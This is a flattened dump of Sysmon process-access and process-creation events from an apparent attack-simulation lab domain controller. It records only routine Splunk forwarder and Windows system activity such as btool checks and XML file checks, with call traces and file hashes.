13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.114{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.077{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.061{59A5CD1D-8EE4-6005-C400-00000000A301}35083796C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8EE6-6005-D200-00000000A301}47564704C:\Windows\system32\cmd.exe{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.938{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000004011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 